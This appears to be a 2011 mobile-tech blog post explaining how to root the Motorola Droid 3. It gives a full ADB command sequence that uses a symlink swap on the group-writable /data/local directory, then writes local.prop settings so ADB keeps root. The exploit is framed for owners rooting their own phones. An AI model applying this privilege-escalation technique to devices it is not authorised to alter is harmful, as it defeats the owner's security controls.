How to Root the Motorola Droid 3

By Joe Levi | August 26, 2011 4:49 PM

The Motorola Droid 3 has been rooted! What’s even more impressive was that it was done without the developer ever having touched a Droid 3. While that is impressive, the process itself is even more so!

After performing an audit of the platform, it was discovered that the contents of /data/local are group “shell” and group-writable. That means the contents of the directory can be modified using ADB. In Linux (and Android, by extension), you can replace a directory with a “symbolic link” (or “symlink”), essentially, a pointer to another location. Additionally, when you reboot the device, it will change the ownership of the symlink target to group “shell”, which can be used to edit property files and achieve root.

Here’s what to do:

0. Assume the risks of potentially harming your device

1. Enable USB debugging on your smartphone

2. Connect your smartphone to your computer via USB

3. Open a command prompt and navigate to the Android SDK tools folder (which contains the ADB files)

4. Type adb shell (enter)

5. Type mv /data/local/12m /data/local/12m.bak (enter)

6. Type ln -s /data /data/local/12m (enter)

7. Press the power button to physically reboot the phone

8. When it has rebooted, connect using adb shell again

9. Type rm /data/local/12m (enter)

10. Type mv /data/local/12m.bak /data/local/12m (enter)

11. mv /data/local.prop /data/local.prop.bak (enter)

12. echo “ro.sys.atvc_allow_netmon_usb=0″ > /data/local.prop (enter)

13. echo “ro.sys.atvc_allow_netmon_ih=0″ >> /data/local.prop (enter)

14. echo “ro.sys.atvc_allow_res_core=0″ >> /data/local.prop (enter)

15. echo “ro.sys.atvc_allow_res_panic=0″ >> /data/local.prop (enter)

16. echo “ro.sys.atvc_allow_all_adb=1″ >> /data/local.prop (enter)

17. echo “ro.sys.atvc_allow_all_core=0″ >> /data/local.prop (enter)

18. echo “ro.sys.atvc_allow_efem=0″ >> /data/local.prop (enter)

19. echo “ro.sys.atvc_allow_bp_log=0″ >> /data/local.prop (enter)

20. echo “ro.sys.atvc_allow_ap_mot_log=0″ >> /data/local.prop (enter)

21. echo “ro.sys.atvc_allow_gki_log=0″ >> /data/local.prop (enter)

22. Press the power button to physically reboot the phone

Just in case you were wondering, ro.sys.atvc_allow_all_adb is a Motorola-specific property that prevents ADB from dropping its root privileges.

Congratulations! You should now have root!

Source: Vulnfactory.org

This post has been tagged with:
Related to this post
How to Root Your Galaxy Nexus Without Unlocking the Bootloader (Video)
Motorola Droid RAZR M Review
Motorola Droid RAZR M Unboxing (Video)
Motorola Unveils Droid RAZR HD, Droid RAZR Maxx HD, and Droid RAZR M
Latest Motorola Firmware Tracks Phone Root Status
Motorola Droid M Spotted In Verizon Leak
Popular Posts
Samsung Galaxy S 4 vs HTC One vs Apple iPhone 5 vs Nokia 808 PureView Camera Comparison
Anton Thinks: The Mobile Future of Apple Doesn’t Depend On the iPhone This Year
No Apple Streaming iRadio for WWDC 2013?
Wolfson Audio Processor Could Lead to Best-Sounding Smartphones Yet
Our Shows
Latest Video
Galaxy fingerprint scanning, iPad in trial production, Google HTC One & more - Pocketnow Daily
Up Next
Before and After: An Overclocked HTC One
Popular Videos
Nokia Lumia 925 Hands On
Nokia Lumia 925 Silver vs Black
Mobile Version